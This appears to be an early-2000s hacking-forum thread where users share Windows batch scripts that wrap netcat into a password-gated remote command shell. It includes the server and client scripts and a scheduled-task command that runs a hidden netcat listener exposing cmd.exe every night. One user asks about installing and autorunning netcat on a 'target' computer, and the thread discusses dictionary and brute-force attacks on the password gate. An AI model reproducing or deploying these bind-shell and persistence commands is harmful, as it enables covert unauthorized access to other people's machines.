I've just been playing around with batch commands and netcat, and have come up with this intersting little way of requesting a password.
The theory:
The server runs a simple netcat listener on port 1.
This listener does almost nothing except copy whatever data it is fed to: downps.txt
(nc -l -p 1 > downps.txt)
Upon disconnect, the server compares whatever data is in downps.txt to the data contained in pass.txt (our password).
If the data is the same, a CMD.EXE shell is opened straight away on port 2.
If the two files are different, the server waits for reconnect and does not open the command shell.
Obviously this method is not very secure, as anyone is able to connect to the port 2 command shell after the downps.txt file has been verified against the orriginal pass.txt. However, speed in connecting to the shell as soon as it opens can overcome this barrier. As my "connectnc" program (see below) anticipates the connection to the port 2 shell, it leaves only a fraction of a second in which another system could connect to the shell as netcat only supports one connection at a time.
In effect:
Pass.txt = moron
Server listens...
-Client connects
-Client sends 'helloooo'
Server copies 'heloooo' to downps.txt
Server compares downps.txt to pass.txt
They are not the same,
Sever resets...
Server listens...
-Client connetcs
-Client sends 'moron'
Server copies 'moron' to downps.txt
Server compares downps.txt to pass.txt
They are the same,
Server opens CMD.EXE on port 2
-Client immediately connects to port 2 and gets his shell
Simple really.
So, here's my code:
PASSNC.BAT (This is to be run on the server)
Full Version: New Netcat Fun
| CODE |
:START @nc -l -p 1 > downps.txt @fc downps.txt pass.txt | FIND /i "FC: no differences encountered" > nul @IF errorlevel==1 goto WRONG @REM password ok (the files are the same) @echo password CORRECT! @del downps.txt @nc -vv -l -p 2 -e cmd.exe @GOTO START :WRONG @echo password incorrect @del downps.txt @GOTO START |
PASS.TXT
| QUOTE |
moron |
CONNECTNC.BAT (This is used to connect to the server)
| CODE |
@echo %1 | nc www.xxx.yyy.zzz 1 -w 1 @echo password sent... nc -vv www.xxx.yyy.zzz 2 |
(USAGE: CONNECTNC [PASSWORD] eg CONNECTNC moron)
A successful connect will look something like this:
| QUOTE |
C:\Documents and Settings\Ed\Desktop>connectnc moron password sent... C:\Documents and Settings\Ed\Desktop>nc -vv 127.0.0.1 2 DNS fwd/rev mismatch: localhost != ED localhost [127.0.0.1] 2 (?) open Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Ed\Desktop> |
Yes there are many programs that can do all this for you, but what do they teach you? Nothing. - This is much more fun! (In a min i'll post how to hack it!
)If you don't understand the code, just say so. I couldn't be bothered to 'comment' it, so i'd be more than happy to help out.
Ok, perhaps I was being too ambitious in trying to hack this code so quickly...
My initial ideas don't seem to be getting me anywhere, so when you've finished playing around with the above, could you please give me a hand? heehee.
1) A dictionary attack.
- Well, actually, i've done this one, and yes, it does work - but who would ever choose such a weak password?!
2) A brute force attack.
- I've never written this sort of script in DOS and am not really sure how to go about it. I'll have a think about that one later
3) Corrupting the FIND or FC commands that run inside PASSNC.BAT
- Again, no joy here. I've tried fireing "^C"s as the password, but that won't produce any error. The only error i've been able to make FC reproduce is:
223 x A (Or was is 224? - Oooops)
My initial ideas don't seem to be getting me anywhere, so when you've finished playing around with the above, could you please give me a hand?
heehee.1) A dictionary attack.
- Well, actually, i've done this one, and yes, it does work - but who would ever choose such a weak password?!
2) A brute force attack.
- I've never written this sort of script in DOS and am not really sure how to go about it. I'll have a think about that one later
3) Corrupting the FIND or FC commands that run inside PASSNC.BAT
- Again, no joy here. I've tried fireing "^C"s as the password, but that won't produce any error. The only error i've been able to make FC reproduce is:
223 x A (Or was is 224? - Oooops)
| QUOTE |
C:\Documents and Settings\Ed\Desktop>fc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAA pass.txt FC: Out of memory |
And anyway, the connecting client would have no control over what the file could be called. PASSNC.BAT always calls it downps.txt no matter what.
Just a thought: There are no controls over just how big downps.txt can actually be, so what's stopping us giving say ooooh 50GB of data to really give to HDD a hard time?
EDIT: Ok, i've realised what's stopping us from doing that: "@del downps.txt". There would be no point in uploading a massive file as it would only be deleted on disconnect.
As far as I can see (which is not very far), is that this little script is supprisingly secure as a password feature. What's more, it's fully customisable and you just can't but feel you're a "hacker" (in the true, rather more philosophical sense of the word) when using it. Heehee, even if it is lame code
If anyone does come up with an interesting way to break this then please post it up - i'd really really really like to know, lol. And at that, please do try to break it
- it's my code, and i'd love to know it's weaknesses.(The code contained in these two posts is for educational purposes ONLY. I accept no responsibility for any damage it may cause. Use at your own risk.)
wow
look at this:
http://www.itcow.com/staticpages/index.php...030130141516630
you will be amazed how much this has nothing to do with computer security, bath programs or even your topic (hehe), but it's a nice link for these spare times
look at this:
http://www.itcow.com/staticpages/index.php...030130141516630
you will be amazed how much this has nothing to do with computer security, bath programs or even your topic (hehe), but it's a nice link for these spare times
your could try
www.ericphelps.com
whatever you cannot do in dos you CAN do in VBS script.
:-)
diz
Uk
agamemnon drop us a email i'd like to see what else you have on batch file stuff, maybe even swap ideas
www.ericphelps.com
whatever you cannot do in dos you CAN do in VBS script.
:-)
diz
Uk
agamemnon drop us a email i'd like to see what else you have on batch file stuff, maybe even swap ideas
(PM me, I don't like email)
Maybe we should have a BATCH subsection of the forum? How many of us are there that would find such a thing usefull?
Of course, who says that pass.txt (above) needs to be a txt file? It could be anything. You could use a program as the 'password'...
The most secure way, would be to have a long binary file as the password. Ouf, i'll leave it to your imagination. It's pretty versitile code.
Maybe we should have a BATCH subsection of the forum? How many of us are there that would find such a thing usefull?
Of course, who says that pass.txt (above) needs to be a txt file? It could be anything. You could use a program as the 'password'...
The most secure way, would be to have a long binary file as the password. Ouf, i'll leave it to your imagination. It's pretty versitile code.
Very few interested replies 
Here are the programs then - with newly added instructions.
Here are the programs then - with newly added instructions.
you could do "type PASSNC.BAT" ?? and then you see the pass is in pass.txt >>
type pass.txt
or am i thinking wrong here
?? and then you see the pass is in pass.txt >> type pass.txt
or am i thinking wrong here
Yeah... you're thinking wrong... sorry!
Server is on the right, client on the left:
--------port1---->PASSWORD REQUEST<----port1---SENDSEPASSWORD
recieved password -> downps.txt
downps compared to pass.txt
pass.txt
|
|
The same?:-------port2------->SHELL<---port2-----CONNECTS SHELL
|
|
Not the same?----RESTARTS|
The client is not able to run 'type pass.txt' untill he has got the password right. Of course, once he's got the shell he's quite intitled to "echo hahaha, i've changed the password > pass.txt".
Server is on the right, client on the left:
--------port1---->PASSWORD REQUEST<----port1---SENDSEPASSWORD
recieved password -> downps.txt
downps compared to pass.txt
pass.txt
|
|
The same?:-------port2------->SHELL<---port2-----CONNECTS SHELL
|
|
Not the same?----RESTARTS|
The client is not able to run 'type pass.txt' untill he has got the password right. Of course, once he's got the shell he's quite intitled to "echo hahaha, i've changed the password > pass.txt".
salutes to all d guru out there
i been tryin 2 play ard wif NC. but stil can get it 2 werk.
here is my Ques:-
if i manage 2 install NC in target comp & use a .bat file 2 autorun it everytime.
i should get a cmd interface when i connect to it, iz dat rite?
if i do get cmd interface once connted, means dat i can use dos juz like normal cmd?
thks 4 answerin my naive ques in advance
i been tryin 2 play ard wif NC. but stil can get it 2 werk.
here is my Ques:-
if i manage 2 install NC in target comp & use a .bat file 2 autorun it everytime.
i should get a cmd interface when i connect to it, iz dat rite?
if i do get cmd interface once connted, means dat i can use dos juz like normal cmd?
thks 4 answerin my naive ques in advance
nice topic
well this is another good command for nc to run it at a specific time:
for example
C:\\> at\\127.0.0.1 12:00a/every : 1 " " nc -d -l -p 8080 -c cmd.exe
this command make NetCat to listen on port 8080 in Stealth mode every day at 12:00 AM
well this is another good command for nc to run it at a specific time:
for example
C:\\> at\\127.0.0.1 12:00a/every : 1 " " nc -d -l -p 8080 -c cmd.exe
this command make NetCat to listen on port 8080 in Stealth mode every day at 12:00 AM
i like it ... good work :-D
| QUOTE (LittleHacker @ Dec 22 2003, 02:53 PM) |
| nice topic well this is another good command for nc to run it at a specific time: for example C:\\> at\\127.0.0.1 12:00a/every : 1 " " nc -d -l -p 8080 -c cmd.exe this command make NetCat to listen on port 8080 in Stealth mode every day at 12:00 AM |
Nice..
Oh
very nice!! I´will test it :-)
THX
toostrong
very nice!! I´will test it :-)
THX
toostrong
let's give it a try, good job btw 
fantastic - good function. i'll try it out now!
Thanks EveryBody
| QUOTE (agamemnon @ Oct 6 2003, 03:04 PM) |
| Maybe we should have a BATCH subsection of the forum? How many of us are there that would find such a thing usefull? |
I think it will be nice ... I love batch programming
This is a great post,
Lots of usefull stuff inhere.
Thx all
Lots of usefull stuff inhere.
Thx all
realy nice m8
gonna give it a try !
edit : it dont work here always getting pass incorrect
uploaded pass.txt passnc.bat and nc.exe to the server
then passnc.bat
pass.txt is a
typed connectnc.bat a
sending pass...
connection refused
tried this @home and remote didnt work on any of them
could someone explain what i am doing wrong here :s
tia..
gonna give it a try !
edit : it dont work here always getting pass incorrect
uploaded pass.txt passnc.bat and nc.exe to the server
then passnc.bat
pass.txt is a
typed connectnc.bat a
sending pass...
connection refused
tried this @home and remote didnt work on any of them
could someone explain what i am doing wrong here :s
tia..
Another nice nc batch password discussion.
You still haven't posted how to hack it, if there's a way to bypass the password check from within the batch file I'd be interested to see it.
BTW I came up with a stripped down password prompt batch file, no need to create multiple files or open a second port.
Just set nc to pipe this batch file on any given port:
You still haven't posted how to hack it, if there's a way to bypass the password check from within the batch file I'd be interested to see it.
BTW I came up with a stripped down password prompt batch file, no need to create multiple files or open a second port.
Just set nc to pipe this batch file on any given port:
| CODE |
@echo off @echo @set /p pass=Enter password: IF not "%pass%"=="pass" goto else @cmd.exe :else @echo Connection terminated. @pause |
What do you think?
i think a batch forum would be a cool idea!
nice scripts using nc btw
they work wonders and are simple and easy to understand nice1!
nice scripts using nc btw
they work wonders and are simple and easy to understand nice1!
| QUOTE |
| i think a batch forum would be a cool idea! |
There is a programming section, and a windows section, and if we add a batch forum, we sure as hell add a shell script forum too. So I would have to say I'm against a batch only forum. Feel free to add to the programming section, maybe start a Batch Tricks and tips thread and anyone can add to it.
| QUOTE |
| @fc downps.txt pass.txt | FIND /i "FC: no differences encountered" > nul |
If don't know if the fc commands is recommanded for that kind of thing. Maybe a md5 checksum could be better, i don't know, what do u think?
| QUOTE |
| ABOUT FC COMMAND : FC or file compare is used to compare two files against each other. Once completed fc will return lines which differ between the two files. If no lines differ you will receive a message indicating no differences encountered. |
master912
Couldn't you just use Cryptcat.exe and have your conntection protection be your encryption key?
That seems to work fine for me. Plus then the connection is encrypted, a bit more secure. And a lot easier to set up. Does anyone have any thoughts about using this way? Is there any cons using Cryptcat's encryption?
That seems to work fine for me. Plus then the connection is encrypted, a bit more secure. And a lot easier to set up. Does anyone have any thoughts about using this way? Is there any cons using Cryptcat's encryption?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
